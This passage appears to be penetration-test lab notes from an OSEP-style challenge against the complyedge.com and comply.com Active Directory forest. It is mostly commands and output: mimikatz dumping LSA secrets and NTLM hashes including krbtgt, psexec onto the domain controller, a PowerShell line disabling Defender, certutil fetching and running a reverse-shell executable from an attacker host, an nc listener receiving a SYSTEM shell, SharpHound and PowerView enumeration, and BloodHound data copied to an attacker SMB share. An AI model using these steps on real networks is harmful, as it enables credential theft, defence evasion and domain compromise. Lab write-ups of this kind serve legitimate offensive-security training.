m/u : 57269d1af0c4a13fca9b9d432b4a521cfc894436 / c331664f25f5ea7d28ba75a93a3e05831682ec9c
old/hex : 01 00 00 00 84 00 e1 99 16 02 f0 21 70 56 e6 fc 4f d4 7c ba 8c 9f 15 9b a1 69 95 7e 10 59 da 4e fb 06 1c e7 e3 84 8f 60 58 8f 40 dc
full: 8400e1991602f0217056e6fc4fd47cba8c9f159ba169957e1059da4efb061ce7e3848f60588f40dc
m/u : 8400e1991602f0217056e6fc4fd47cba8c9f159b / a169957e1059da4efb061ce7e3848f60588f40dc
Secret : NL$KM
cur/hex : 97 6c 5b 88 f8 d1 a6 9d 07 4a 21 93 07 70 c2 42 d1 f9 b7 45 98 7d a5 9e e1 38 20 60 86 2c 8a 93 40 17 5f db 48 29 a9 1b 87 28 ac ed de 49 e2 1d 56 29 be c2 f1 18 ef 6a 9f 54 d1 30 4d c2 01 78
old/hex : 97 6c 5b 88 f8 d1 a6 9d 07 4a 21 93 07 70 c2 42 d1 f9 b7 45 98 7d a5 9e e1 38 20 60 86 2c 8a 93 40 17 5f db 48 29 a9 1b 87 28 ac ed de 49 e2 1d 56 29 be c2 f1 18 ef 6a 9f 54 d1 30 4d c2 01 78
c:\\Users\\Administrator\\Desktop>mimikatz.exe
mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <https://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <https://pingcastle.com> / <https://mysmartlogon.com> ***/
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # lsadump::lsa /patch
Domain : COMPLYEDGE / S-1-5-21-1416213050-106196312-571527550
RID : 000001f4 (500)
User : Administrator
LM :
NTLM : 289136c329f3e42331048a0465b2290a
RID : 000001f5 (501)
User : Guest
LM :
NTLM :
RID : 000001f6 (502)
User : krbtgt
LM :
NTLM : 1972974715cd3613d4105ad189e54950
RID : 0000044f (1103)
User : pete
LM :
NTLM : 61c6e14f88cd70638f901ea51796a194
RID : 00000452 (1106)
User : sshd
LM :
NTLM : 8fa75d9aa9f3b6a05eb9e24fc1b9cdfe
**RID : 00000453 (1107)
User : jim
LM :
NTLM : e48c13cefd8f9456d79cd49651c134e8**
RID : 000003e8 (1000)
User : DMZDC01$
LM :
NTLM : 0d5228237a9025ef742c9f786985f852
RID : 00000454 (1108)
User : WEB05$
LM :
NTLM : fec48ee9b5fe6556529b0909ab921e7d
RID : 00000450 (1104)
User : COMPLY$
LM :
NTLM : 1dd653b77c4828e8732706cc42da24d0
换成一个msf的反弹shell
┌──(kali㉿kali)-[~/Documents/osep/Challenge/5]
└─$ **impacket-psexec -k -no-pass -target-ip 172.16.64.168 -dc-ip 172.16.64.168 dmzdc01.complyedge.com**
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 172.16.64.168.....
[*] Found writable share ADMIN$
[*] Uploading file ctTSLPZD.exe
[*] Opening SVCManager on 172.16.64.168.....
[*] Creating service uyUi on 172.16.64.168.....
[*] Starting service uyUi.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1397]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\\Windows\\system32> powershell -exec bypass -c "Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -Verbose"
VERBOSE: Performing operation 'Update MSFT_MpPreference' on Target 'ProtectionManagement'.
C:\\Windows\\system32> cd c:\\Users\\Administrator\\Desktop
c:\\Users\\Administrator\\Desktop> **certutil.exe -urlcache -f <http://192.168.49.64/rev.exe> rev.exe**
**** Online ****
CertUtil: -URLCache command completed successfully.
c:\\Users\\Administrator\\Desktop> rev.exe
得到反弹的shell:
┌──(kali㉿kali)-[~/Documents/osep/Challenge/5]
└─$ nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.49.64] from (UNKNOWN) [192.168.64.169] 62158
Microsoft Windows [Version 10.0.17763.1397]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\\Users\\Administrator\\Desktop>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 172.16.64.168
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.64.254
c:\\Users\\Administrator\\Desktop>hostname
hostname
dmzdc01
c:\\Users\\Administrator\\Desktop>whoami
whoami
nt authority\\system
c:\\Users\\Administrator\\Desktop>**certutil.exe -urlcache -f <http://192.168.49.64/Seatbelt_x64.exe> Seatbelt_x64.exe**
certutil.exe -urlcache -f <http://192.168.49.64/Seatbelt_x64.exe> Seatbelt_x64.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
PowerView Enum:
PS C:\\Users\\Administrator\\Desktop> Import-Module .\\PowerView.ps1
Import-Module .\\PowerView.ps1
PS C:\\Users\\Administrator\\Desktop> **Get-ForestTrust**
Get-ForestTrust
TopLevelNames : {comply.com}
ExcludedTopLevelNames : {}
TrustedDomainInformation : {ops.comply.com, comply.com}
SourceName : complyedge.com
TargetName : comply.com
TrustType : Forest
TrustDirection : **Bidirectional**
PS C:\\Users\\Administrator\\Desktop> **Get-DomainTrust**
Get-DomainTrust
SourceName : complyedge.com
TargetName : comply.com
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : FOREST_TRANSITIVE
TrustDirection : **Bidirectional**
WhenCreated : 7/15/2020 8:57:12 PM
WhenChanged : 7/31/2022 8:19:00 AM
PS C:\\Users\\Administrator\\Desktop> **Get-DomainTrust -Domain comply.com**
Get-DomainTrust -Domain comply.com
SourceName : comply.com
TargetName : ops.comply.com
**TrustType : WINDOWS_ACTIVE_DIRECTORY**
TrustAttributes : WITHIN_FOREST
TrustDirection : Bidirectional
WhenCreated : 7/15/2020 8:42:49 PM
WhenChanged : 7/31/2022 8:19:15 AM
SourceName : comply.com
TargetName : complyedge.com
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : FOREST_TRANSITIVE
TrustDirection : Bidirectional
WhenCreated : 7/15/2020 8:57:11 PM
WhenChanged : 7/31/2022 8:19:00 AM
PS C:\\Users\\Administrator\\Desktop> **Get-DomainTrust -Domain ops.comply.com**
Get-DomainTrust -Domain ops.comply.com
SourceName : ops.comply.com
TargetName : comply.com
**TrustType : WINDOWS_ACTIVE_DIRECTORY**
TrustAttributes : WITHIN_FOREST
TrustDirection : Bidirectional
WhenCreated : 7/15/2020 8:42:49 PM
WhenChanged : 7/31/2022 8:19:15 AM
PS C:\\Users\\Administrator\\Desktop> **Get-DomainTrust -Domain complyedge.com**
Get-DomainTrust -Domain complyedge.com
SourceName : complyedge.com
TargetName : comply.com
**TrustType : WINDOWS_ACTIVE_DIRECTORY**
TrustAttributes : FOREST_TRANSITIVE
TrustDirection : Bidirectional
WhenCreated : 7/15/2020 8:57:12 PM
WhenChanged : 7/31/2022 8:19:00 AM
SharpHound信息收集:
c:\\Users\\Administrator\\Desktop>SharpHound.exe
SharpHound.exe
2022-07-31T02:52:20.8028751-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-07-31T02:52:20.8184980-07:00|INFORMATION|Initializing SharpHound at 2:52 AM on 7/31/2022
2022-07-31T02:52:21.1309994-07:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-07-31T02:52:21.2559915-07:00|INFORMATION|Beginning LDAP search for complyedge.com
2022-07-31T02:52:21.2872416-07:00|INFORMATION|Producer has finished, closing LDAP channel
2022-07-31T02:52:21.2872416-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2022-07-31T02:52:51.9278758-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 35 MB RAM
2022-07-31T02:53:08.0372483-07:00|INFORMATION|Consumers finished, closing output channel
2022-07-31T02:53:08.0684897-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2022-07-31T02:53:08.2247454-07:00|INFORMATION|Status: 102 objects finished (+102 2.217391)/s -- Using 58 MB RAM
2022-07-31T02:53:08.2247454-07:00|INFORMATION|Enumeration finished in 00:00:46.9789627
2022-07-31T02:53:08.3341209-07:00|INFORMATION|SharpHound Enumeration Completed at 2:53 AM on 7/31/2022! Happy Graphing!
c:\\Users\\Administrator\\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is D04B-1DA6
Directory of c:\\Users\\Administrator\\Desktop
07/31/2022 02:53 AM <DIR> .
07/31/2022 02:53 AM <DIR> ..
07/31/2022 02:53 AM 11,568 20220731025307_BloodHound.zip
07/31/2022 02:49 AM 791,196 PowerView.ps1
07/15/2020 02:22 PM 32 proof.txt
07/31/2022 02:48 AM 908,288 SharpHound.exe
07/31/2022 02:53 AM 9,073 ZjI3OWFlNTEtYTg4ZS00NzNjLWI0NzItN2Y3MTIxNmU3YjM0.bin
5 File(s) 1,720,157 bytes
2 Dir(s) 4,546,998,272 bytes free
c:\\Users\\Administrator\\Desktop>**net use v: \\\\192.168.49.64\\share share /u:share**
net use v: \\\\192.168.49.64\\share share /u:share
The command completed successfully.
c:\\Users\\Administrator\\Desktop>**copy 20220731025307_BloodHound.zip v:\\20220731025307_BloodHound.zip**
copy 20220731025307_BloodHound.zip v:\\20220731025307_BloodHound.zip
1 file(s) copied.
c:\\Users\\Administrator\\Desktop>**SharpHound.exe --collectionmethods All --Domain ops.comply.com**
SharpHound.exe --collectionmethods All --Domain ops.comply.com
2022-07-31T03:01:48.5997557-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-07-31T03:01:48.5997557-07:00|INFORMATION|Initializing SharpHound at 3:01 AM on 7/31/2022
2022-07-31T03:01:49.4122475-07:00|INFORMATION|Loaded cache with stats: 61 ID to type mappings.
61 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2022-07-31T03:01:49.4278620-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-07-31T03:01:49.6622514-07:00|INFORMATION|Beginning LDAP search for ops.comply.com
2022-07-31T03:01:49.7247378-07:00|INFORMATION|Producer has finished, closing LDAP channel
2022-07-31T03:01:49.7403819-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2022-07-31T03:02:20.1310316-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 39 MB RAM
2022-07-31T03:02:36.6466153-07:00|INFORMATION|Consumers finished, closing output channel
2022-07-31T03:02:36.6778614-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2022-07-31T03:02:36.8341157-07:00|INFORMATION|Status: 101 objects finished (+101 2.148936)/s -- Using 58 MB RAM
2022-07-31T03:02:36.8341157-07:00|INFORMATION|Enumeration finished in 00:00:47.1637222
2022-07-31T03:02:36.9122476-07:00|INFORMATION|SharpHound Enumeration Completed at 3:02 AM on 7/31/2022! Happy Graphing!
c:\\Users\\Administrator\\Desktop>**SharpHound.exe --collectionmethods All --Domain comply.com**
SharpHound.exe --collectionmethods All --Domain comply.com
2022-07-31T03:03:28.5684989-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-07-31T03:03:28.5684989-07:00|INFORMATION|Initializing SharpHound at 3:03 AM on 7/31/2022
2022-07-31T03:03:28.8810013-07:00|INFORMATION|Loaded cache with stats: 127 ID to type mappings.
128 name to SID mappings.
0 machine sid mappings.
7 sid to domain mappings.
0 global catalog mappings.
2022-07-31T03:03:28.8966775-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-07-31T03:03:29.1622521-07:00|INFORMATION|Beginning LDAP search for comply.com
2022-07-31T03:03:29.1935076-07:00|INFORMATION|Producer has finished, closing LDAP channel
2022-07-31T03:03:29.1935076-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2022-07-31T03:04:00.1153802-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 40 MB RAM
2022-07-31T03:04:13.1466116-07:00|INFORMATION|Consumers finished, closing output channel
2022-07-31T03:04:13.1778768-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2022-07-31T03:04:13.3341331-07:00|INFORMATION|Status: 94 objects finished (+94 2.136364)/s -- Using 58 MB RAM
2022-07-31T03:04:13.3341331-07:00|INFORMATION|Enumeration finished in 00:00:44.1841588
2022-07-31T03:04:13.4278684-07:00|INFORMATION|SharpHound Enumeration Completed at 3:04 AM on 7/31/2022! Happy Graphing!
c:\\Users\\Administrator\\Desktop>**SharpHound.exe --collectionmethods All --Domain complyedge.com**
SharpHound.exe --collectionmethods All --Domain complyedge.com
2022-07-31T03:08:18.0997513-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-07-31T03:08:18.0997513-07:00|INFORMATION|Initializing SharpHound at 3:08 AM on 7/31/2022
2022-07-31T03:08:18.5216184-07:00|INFORMATION|Loaded cache with stats: 178 ID to type mappings.
180 name to SID mappings.
0 machine sid mappings.
7 sid to domain mappings.
0 global catalog mappings.
2022-07-31T03:08:18.5216184-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-07-31T03:08:18.6466179-07:00|INFORMATION|Beginning LDAP search for complyedge.com
2022-07-31T03:08:18.6622478-07:00|INFORMATION|Producer has finished, closing LDAP channel
2022-07-31T03:08:18.6622478-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2022-07-31T03:08:48.7247488-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 39 MB RAM
2022-07-31T03:09:03.0528853-07:00|INFORMATION|Consumers finished, closing output channel
2022-07-31T03:09:03.0841220-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2022-07-31T03:09:03.2403714-07:00|INFORMATION|Status: 102 objects finished (+102 2.318182)/s -- Using 54 MB RAM
2022-07-31T03:09:03.2403714-07:00|INFORMATION|Enumeration finished in 00:00:44.6019701
2022-07-31T03:09:03.3341197-07:00|INFORMATION|SharpHound Enumeration Completed at 3:09 AM on 7/31/2022! Happy Graphing!
c:\\Users\\Administrator\\Desktop>**copy 20220731030236_BloodHound.zip v:\\20220731030236_BloodHound.zip**
copy 20220731030236_BloodHound.zip v:\\20220731030236_BloodHound.zip
1 file(s) copied.
c:\\Users\\Administrator\\Desktop>**copy 20220731030412_BloodHound.zip v:\\20220731030412_BloodHound.zip**
copy 20220731030412_BloodHound.zip v:\\20220731030412_BloodHound.zip
1 file(s) copied.
c:\\Users\\Administrator\\Desktop>**copy 20220731030902_BloodHound.zip v:\\20220731030902_BloodHound.zip**
copy 20220731030902_BloodHound.zip v:\\20220731030902_BloodHound.zip
1 file(s) copied.
PowerView枚举每个域的用户:
PS C:\\Users\\Administrator\\Desktop> Import-Module .\\PowerView.ps1
Import-Module .\\PowerView.ps1
PS C:\\Users\\Administrator\\Desktop> **Get-DomainUser -domain ops.comply.com**
Get-DomainUser -domain ops.comply.com
logoncount : 44
iscriticalsystemobject : True
description : Built-in account for administering the computer/domain
distinguishedname : CN=Administrator,CN=Users,DC=ops,DC=comply,DC=com
objectclass : {top, person, organizationalPerson, user}
lastlogontimestamp : 7/31/2022 1:04:06 AM
name : Administrator
objectsid : S-1-5-21-2032401531-514583578-4118054891-500
samaccountname : Administrator
logonhours : {255, 255, 255, 255...}
admincount : 1
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : 12/31/1600 4:00:00 PM
cn : Administrator
whenchanged : 7/31/2022 8:04:06 AM
instancetype : 4
usncreated : 8196
objectguid : 3667857b-d2e0-45ea-ac5c-4b48a43586cf
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata : {7/15/2020 8:58:48 PM, 7/15/2020 8:58:48 PM, 7/15/2020 8:43:38 PM, 1/1/1601 6:12:16 PM}
memberof : {CN=Group Policy Creator Owners,CN=Users,DC=ops,DC=comply,DC=com, CN=Domain
Admins,CN=Users,DC=ops,DC=comply,DC=com, CN=Administrators,CN=Builtin,DC=ops,DC=comply,DC=com}
lastlogon : 7/31/2022 1:04:07 AM
badpasswordtime : 9/21/2020 5:40:22 AM
badpwdcount : 0
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated : 7/15/2020 8:42:49 PM
countrycode : 0
primarygroupid : 513
pwdlastset : 8/2/2020 10:51:52 AM
usnchanged : 69689
pwdlastset : 12/31/1600 4:00:00 PM
logoncount : 0
badpasswordtime : 12/31/1600 4:00:00 PM
description : Built-in account for guest access to the computer/domain
distinguishedname : CN=Guest,CN=Users,DC=ops,DC=comply,DC=com
objectclass : {top, person, organizationalPerson, user}
name : Guest
objectsid : S-1-5-21-2032401531-514583578-4118054891-501
samaccountname : Guest
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
cn : Guest
whenchanged : 7/15/2020 8:42:49 PM
instancetype : 4
usncreated : 8197
objectguid : 517d1f2a-3a11-4b76-8d64-238f18f5dcc3
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata : {7/15/2020 8:43:38 PM, 1/1/1601 12:00:01 AM}
memberof : CN=Guests,CN=Builtin,DC=ops,DC=comply,DC=com
lastlogon : 12/31/1600 4:00:00 PM
badpwdcount : 0
useraccountcontrol : ACCOUNTDISABLE, PASSWD_NOTREQD, NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated : 7/15/2020 8:42:49 PM
countrycode : 0
primarygroupid : 514
iscriticalsystemobject : True
usnchanged : 8197
logoncount : 0
iscriticalsystemobject : True
description : Key Distribution Center Service Account
distinguishedname : CN=krbtgt,CN=Users,DC=ops,DC=comply,DC=com
objectclass : {top, person, organizationalPerson, user}
name : krbtgt
showinadvancedviewonly : True
objectsid : S-1-5-21-2032401531-514583578-4118054891-502
samaccountname : krbtgt
admincount : 1
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
cn : krbtgt
whenchanged : 7/15/2020 8:58:48 PM
instancetype : 4
usncreated : 12300
objectguid : 387a313b-0a95-45b2-8e7a-c0a21ebdae6e
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata : {7/15/2020 8:58:48 PM, 7/15/2020 8:43:38 PM, 1/1/1601 12:04:16 AM}
serviceprincipalname : kadmin/changepw
memberof : CN=Denied RODC Password Replication Group,CN=Users,DC=ops,DC=comply,DC=com
lastlogon : 12/31/1600 4:00:00 PM
badpasswordtime : 12/31/1600 4:00:00 PM
badpwdcount : 0
useraccountcontrol : ACCOUNTDISABLE, NORMAL_ACCOUNT
whencreated : 7/15/2020 8:43:38 PM
countrycode : 0
primarygroupid : 513
pwdlastset : 7/15/2020 1:43:38 PM
msds-supportedencryptiontypes : 0
usnchanged : 13044
logoncount : 16
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=Pete,OU=OpsAdmins,OU=OpsUsers,DC=ops,DC=comply,DC=com
objectclass : {top, person, organizationalPerson, user}
displayname : Pete
lastlogontimestamp : 7/31/2022 2:38:53 AM
userprincipalname : [email protected]
name : Pete
objectsid : S-1-5-21-2032401531-514583578-4118054891-1104
samaccountname : pete
admincount : 1
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
cn : Pete
whenchanged : 7/31/2022 9:38:53 AM
instancetype : 4
usncreated : 13078
objectguid : 8340879d-f78e-48e3-95ad-4e8bb7882379
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata : {7/15/2020 9:58:48 PM, 1/1/1601 12:00:00 AM}
givenname : Pete
memberof : CN=Domain Admins,CN=Users,DC=ops,DC=comply,DC=com
lastlogon : 7/31/2022 2:38:53 AM
badpwdcount : 0
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated : 7/15/2020 9:18:26 PM
countrycode : 0
primarygroupid : 513
pwdlastset : 7/15/2020 2:18:26 PM
usnchanged : 69942
logoncount : 4
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=Nina,OU=OpsAdmins,OU=OpsUsers,DC=ops,DC=comply,DC=com
objectclass : {top, person, organizationalPerson, user}
displayname : Nina
lastlogontimestamp : 7/15/2020 11:49:19 PM
userprincipalname : [email protected]
name : Nina
objectsid : S-1-5-21-2032401531-514583578-4118054891-1109
samaccountname : nina
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
cn : Nina
whenchanged : 7/16/2020 6:49:19 AM
instancetype : 4
usncreated : 13717
objectguid : 627efa6d-1a04-45fb-aea9-614aa0f6c786
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata : 1/1/1601 12:00:00 AM
givenname : Nina
memberof : CN=FileAdmin,OU=OpsGroups,DC=ops,DC=comply,DC=com
lastlogon : 7/15/2020 11:51:58 PM
badpwdcount : 0
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated : 7/16/2020 6:48:28 AM
countrycode : 0
primarygroupid : 513
pwdlastset : 7/15/2020 11:48:28 PM
usnchanged : 13726
PS C:\\Users\\Administrator\\Desktop> **Get-DomainUser -Domain complyedge.com**
Get-DomainUser -Domain complyedge.com
logoncount : 28
iscriticalsystemobject : True
description : Built-in account for administering the computer/domain
distinguishedname : CN=Administrator,CN=Users,DC=complyedge,DC=com
objectclass : {top, person, organizationalPerson, user}
lastlogontimestamp : 7/31/2022 1:03:50 AM
name : Administrator
objectsid : S-1-5-21-1416213050-106196312-571527550-500
samaccountname : Administrator
logonhours : {255, 255, 255, 255...}
admincount : 1
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : 12/31/1600 4:00:00 PM
cn : Administrator
whenchanged : 7/31/2022 8:03:50 AM
instancetype : 4
usncreated : 8196
objectguid : 82c88f7e-8039-42cc-8f3e-eb56230de90b
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=complyedge,DC=com
dscorepropagationdata : {7/15/2020 8:43:20 PM, 7/15/2020 8:43:20 PM, 7/15/2020 8:28:10 PM, 1/1/1601 6:12:16 PM}
memberof : {CN=Group Policy Creator Owners,CN=Users,DC=complyedge,DC=com, CN=Domain
Admins,CN=Users,DC=complyedge,DC=com, CN=Enterprise Admins,CN=Users,DC=complyedge,DC=com,
CN=Schema Admins,CN=Users,DC=complyedge,DC=com...}
lastlogon : 7/31/2022 1:03:52 AM
badpasswordtime : 12/8/2020 2:47:31 AM
badpwdcount : 0
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated : 7/15/2020 8:26:45 PM
countrycode : 0
primarygroupid : 513
pwdlastset : 8/2/2020 10:53:07 AM
usnchanged : 86071
pwdlastset : 12/31/1600 4:00:00 PM
logoncount : 0
badpasswordtime : 12/31/1600 4:00:00 PM
description : Built-in account for guest access to the computer/domain
distinguishedname : CN=Guest,CN=Users,DC=complyedge,DC=com
objectclass : {top, person, organizationalPerson, user}
name : Guest
objectsid : S-1-5-21-1416213050-106196312-571527550-501
samaccountname : Guest
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
cn : Guest
whenchanged : 7/15/2020 8:26:45 PM
instancetype : 4
usncreated : 8197
objectguid : 75307c5e-f3c6-4695-872c-03a154017c6f
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=complyedge,DC=com
dscorepropagationdata : {7/15/2020 8:28:10 PM, 1/1/1601 12:00:01 AM}
memberof : CN=Guests,CN=Builtin,DC=complyedge,DC=com
lastlogon : 12/31/1600 4:00:00 PM
badpwdcount : 0
useraccountcontrol : ACCOUNTDISABLE, PASSWD_NOTREQD, NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated : 7/15/2020 8:26:45 PM
countrycode : 0
primarygroupid : 514
iscriticalsystemobject : True
usnchanged : 8197
logoncount : 0
iscriticalsystemobject : True
description : Key Distribution Center Service Account
distinguishedname : CN=krbtgt,CN=Users,DC=complyedge,DC=com
objectclass : {top, person, organizationalPerson, user}
name : krbtgt
showinadvancedviewonly : True
objectsid : S-1-5-21-1416213050-106196312-571527550-502
samaccountname : krbtgt
admincount : 1
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
cn : krbtgt
whenchanged : 7/15/2020 8:43:20 PM
instancetype : 4
usncreated : 12324
objectguid : bdfd3294-0b6f-4601-8306-d616156936db
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=complyedge,DC=com
dscorepropagationdata : {7/15/2020 8:43:20 PM, 7/15/2020 8:28:10 PM, 1/1/1601 12:04:16 AM}
serviceprincipalname : kadmin/changepw
memberof : CN=Denied RODC Password Replication Group,CN=Users,DC=complyedge,DC=com
lastlogon : 12/31/1600 4:00:00 PM
badpasswordtime : 12/31/1600 4:00:00 PM
badpwdcount : 0
useraccountcontrol : ACCOUNTDISABLE, NORMAL_ACCOUNT
whencreated : 7/15/2020 8:28:10 PM
countrycode : 0
primarygroupid : 513
pwdlastset : 7/15/2020 1:28:10 PM
msds-supportedencryptiontypes : 0
usnchanged : 12821
logoncount : 65
badpasswordtime : 7/16/2020 7:47:49 AM
distinguishedname : CN=Pete,OU=CEAdmins,OU=CEUsers,DC=complyedge,DC=com
objectclass : {top, person, organizationalPerson, user}
displayname : Pete
lastlogontimestamp : 7/31/2022 1:05:00 AM
userprincipalname : [email protected]
name : Pete
objectsid : S-1-5-21-1416213050-106196312-571527550-1103
samaccountname : pete
admincount : 1
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
cn : Pete
whenchanged : 7/31/2022 8:05:00 AM
instancetype : 4
usncreated : 12784
objectguid : 9ebf2f73-f14f-47d8-a24b-e26882242ee5
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=complyedge,DC=com
dscorepropagationdata : {7/15/2020 8:43:20 PM, 1/1/1601 12:00:00 AM}
givenname : Pete
memberof : CN=Domain Admins,CN=Users,DC=complyedge,DC=com
lastlogon : 7/31/2022 3:05:00 AM
badpwdcount : 0
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated : 7/15/2020 8:42:05 PM
countrycode : 0
primarygroupid : 513
pwdlastset : 7/15/2020 1:42:05 PM
usnchanged : 86099
logoncount : 0
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=sshd,CN=Users,DC=complyedge,DC=com
objectclass : {top, person, organizationalPerson, user}
displayname : sshd
name : sshd
objectsid : S-1-5-21-1416213050-106196312-571527550-1106
samaccountname : sshd
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
cn : sshd
whenchanged : 7/15/2020 10:35:45 PM
instancetype : 4
usncreated : 12877
objectguid : 315c9b39-440f-44aa-81b4-46043cac1b44
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=complyedge,DC=com
dscorepropagationdata : 1/1/1601 12:00:00 AM
lastlogon : 12/31/1600 4:00:00 PM
badpwdcount : 0
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated : 7/15/2020 10:35:45 PM
countrycode : 0
primarygroupid : 513
pwdlastset : 7/15/2020 3:35:45 PM
usnchanged : 12880
logoncount : 7
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=Jim,OU=CEAdmins,OU=CEUsers,DC=complyedge,DC=com
objectclass : {top, person, organizationalPerson, user}
displayname : Jim
lastlogontimestamp : 8/2/2020 10:42:36 AM
userprincipalname : [email protected]
name : Jim
objectsid : S-1-5-21-1416213050-106196312-571527550-1107
samaccountname : jim
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
cn : Jim
whenchanged : 8/2/2020 5:42:36 PM
instancetype : 4
usncreated : 12925
objectguid : 6eeed88b-133e-4ab0-9687-e46845393226
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=complyedge,DC=com
dscorepropagationdata : 1/1/1601 12:00:00 AM
givenname : Jim
lastlogon : 8/2/2020 10:50:14 AM
badpwdcount : 0
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated : 7/16/2020 7:07:31 AM
countrycode : 0
primarygroupid : 513
pwdlastset : 7/16/2020 12:07:32 AM
usnchanged : 24624
PS C:\\Users\\Administrator\\Desktop> **Get-DomainUser -domain comply.com**
Get-DomainUser -domain comply.com
logoncount : 50
iscriticalsystemobject : True
